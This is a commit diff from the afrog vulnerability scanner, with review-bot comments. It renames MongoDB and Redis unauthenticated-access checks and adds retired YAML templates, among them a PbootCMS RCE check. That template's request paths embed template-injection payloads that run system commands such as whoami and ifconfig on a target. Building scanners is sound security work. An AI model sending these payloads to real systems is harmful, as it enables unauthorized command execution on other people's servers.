Projects STRLCPY afrog Commits ac8f86ca
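--- a/pkg/gopoc/mongodb.go
+++ b/pkg/gopoc/mongodb.go
@@ -10,9 +10,12 @@
  "github.com/zan8in/afrog/pkg/proto"
 )
 
-var mongodbUnAuthName = "mongodb-unauth"
+var (
+ mongodbPort = "27017"
+ mongodbUnAuthName = "mongodb-unauth"
+)
 
-func mongodbAuth(args *GoPocArgs) (Result, error) {
+func mongodbUnAuth(args *GoPocArgs) (Result, error) {
  poc := poc.Poc{
  Id: mongodbUnAuthName,
  Info: poc.Info{
@@ -47,11 +50,11 @@
  }
  }
 
- addr := args.Host + ":27017"
+ addr := args.Host + ":" + mongodbPort
  err := mongodbPayload(addr, senddata, getlogdata)
  if err == nil {
  result.IsVul = true
- url := proto.UrlType{Host: args.Host, Port: "27017"}
+ url := proto.UrlType{Host: args.Host, Port: mongodbPort}
  result.SetAllPocResult(true, &url, []byte(addr), []byte("MongoDB 未授权访问"))
  return result, nil
  }
@@ -93,6 +96,6 @@
 }
 
 func init() {
- GoPocRegister(mongodbUnAuthName, mongodbAuth)
+ GoPocRegister(mongodbUnAuthName, mongodbUnAuth)
 }
 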
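Review bot: `mongodbPort` and `mongodbUnAuthName` in the new `var (...)` block are never reassigned in the visible code, so they belong in a `const (...)` block: a package-level `var` string can be silently mutated by any code in the package, while `const` lets the compiler fold `args.Host + ":" + mongodbPort`. The same applies to `redisPort` and `redisUnAuthName` in pkg/gopoc/redis.go. Fixing the port at package level also means a MongoDB instance listening on a non-default port is never probed; if `GoPocArgs` carries a port (not visible here), using it with 27017 as the fallback would make the check more useful. The body of mongodbUnAuth continues beyond the visible lines of this section.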
  • pkg/gopoc/ms17-010.go pkg/gopoc/ms17010.go
    Content is identical
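--- a/pkg/gopoc/redis.go
+++ b/pkg/gopoc/redis.go
@@ -9,12 +9,14 @@
  "github.com/zan8in/afrog/pkg/utils"
 )
 
-var redisAuthName = "redis-unauth"
+var (
+ redisPort = "6379"
+ redisUnAuthName = "redis-unauth"
+)
 
-func redisAuth(args *GoPocArgs) (Result, error) {
- // init pocinfo & result
+func redisUnAuth(args *GoPocArgs) (Result, error) {
  poc := poc.Poc{
- Id: redisAuthName,
+ Id: redisUnAuthName,
  Info: poc.Info{
  Name: "Redis 未授权访问",
  Author: "zan8in",
@@ -49,7 +51,7 @@
  }
  }
 
- addr := args.Host + ":6379"
+ addr := args.Host + ":" + redisPort
  payload := []byte("*1\r\n$4\r\ninfo\r\n")
 
  resp, err := utils.Tcp(addr, payload)
@@ -59,7 +61,7 @@
 
  if bytes.Contains(resp, []byte("redis_version")) {
  result.IsVul = true
- url := proto.UrlType{Host: args.Host, Port: "6379"}
+ url := proto.UrlType{Host: args.Host, Port: redisPort}
  result.SetAllPocResult(true, &url, payload, resp)
  return result, nil
  }
@@ -68,6 +70,6 @@
 }
 
 func init() {
- GoPocRegister(redisUnAuthName, redisUnAuth)
+ GoPocRegister(redisUnAuthName, redisUnAuth)
 }
 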
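Review bot: The rename removes the only comment on the function (`// init pocinfo & result`) without replacing it, so `redisUnAuth` now has no doc comment at all. Suggest adding `// redisUnAuth sends an INFO command to args.Host on redisPort and reports unauthenticated access when the reply contains "redis_version".` above the signature, which is what the visible lines of the first and third hunks show the function doing. The handling of `err` from `utils.Tcp` falls in the skipped lines between the second and third hunks, so it is not reviewed here; the function body continues outside the visible hunks.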
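--- a/pocs/deleted/h2-console-panel.yaml
+++ b/pocs/deleted/h2-console-panel.yaml
@@ -0,0 +1,21 @@
+id: h2-console-panel
+
+info:
+ name: H2 Console Panel
+ author: 执着
+ severity: critical
+ description: |
+ H2 Console未授权访问,可执行任意系统命令
+ 影响版本3.0.1以前"
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23221
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42392
+
+
+rules:
+ r0:
+ request:
+ method: GET
+ path: /login.jsp
+ exppression: response.status == 200
+exppression: r0()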
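Review bot: The rule and top-level keys are spelled `exppression` (lines 20 and 21 of this file), while pocs/deleted/pbootcms-rce.yaml uses `exppression` at line 27, `expresssion` at line 32 and the correct `expression` at line 33; if the template loader matches keys exactly, the misspelled rules are never evaluated and the template silently does nothing. Both files also end their `description` block with a stray trailing `"` after `影响版本3.0.1以前`, and the severity/description text for this template does not match the path-only check it actually performs. Since both files are added under pocs/deleted/, this may be a deliberate retirement of broken templates; if so, a short comment at the top of each file saying why it was retired (for example `# retired: malformed expression keys, never matched`) would save the next maintainer from re-enabling them unchanged.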
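--- a/pocs/deleted/pbootcms-rce.yaml
+++ b/pocs/deleted/pbootcms-rce.yaml
@@ -0,0 +1,33 @@
+id: pbootcms-rce
+
+info:
+ name: Pboot CMS RCE
+ author: 执着
+ severity: critical
+ description: |
+ PbootCMS前台RCE,执行任意系统命令
+ 影响版本3.0.1以前"
+
+set:
+ reverse: newReverse()
+ reverseURL: reverse.url
+ referer: request.url
+ host: request.url.host
+rules:
+ r0:
+ request:
+ method: GET
+ path: /#}{pboot:if(true)(@sys.@tem)(@whoami);//)}test{/pboot:if}
+ headers:
+ Referer: '{{referer}}'
+ Domain: '{{host}}'
+ Reverse: '{{reverseURL}}'
+ Content-Length: 100
+ Host: 127.0.0.1
+ exppression: response.status == 200 && response.body.bcontains(b'flags=')
+ r1:
+ request:
+ method: GET
+ path: /#}{pboot:if(true)(@sys.@tem)(@ifconfig);//)}test{/pboot:if}
+ expresssion: response.status == 200 && response.body.bcontains(b'Windows')
+expression: r0() || r1()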